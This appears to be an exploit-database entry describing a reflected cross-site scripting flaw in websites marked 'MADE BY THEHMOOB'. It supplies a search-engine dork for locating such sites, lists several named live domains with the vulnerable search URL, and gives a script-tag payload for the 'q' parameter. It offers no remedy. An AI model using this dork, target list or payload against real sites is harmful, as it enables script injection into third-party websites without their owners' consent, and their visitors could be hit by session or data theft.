THEHMOOB Crose-Site-Scripting

2016.10.01

Equ1n0x (AZ)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Dork: inurl:.php?id= intext:"MADE BY THEHMOOB"

##########################################
#                                        #
#          E  Q  U  1  N  0  X           #
#                                        #
##########################################
______________________________________________________________
#Exploit Title: THEHMOOB Crose-Site-Scripting
#Exploit Dork: inurl:.php?id= intext:"MADE BY THEHMOOB"
#Exploit Author: Equ1n0x
#Tested On: Chrome
_______________________________________________________________
#DEMO
_______________________________________________________________
[+] https://modernhmong.com/search.php?q=
[+]http://fujiyoutube.com/search.php?q=
[+]http://79tube.com/search.php?q=
[+]http://www.topyoutubemp3.com/search.php?q=
[+]http://video.hmongcam.com/search.php?q=
[+] And More..
______________________________________________________________
Details:
__________________________________________________________________
#Vuln Parametrs "q"
#Payload: <script>alert('CroseSiteScripting')</script>

__________________________________________________________________ 
#Contact:redkit277@gmail.com
__________________________________________________________________

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

THEHMOOB Crose-Site-Scripting

Dork: inurl:.php?id= intext:"MADE BY THEHMOOB"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.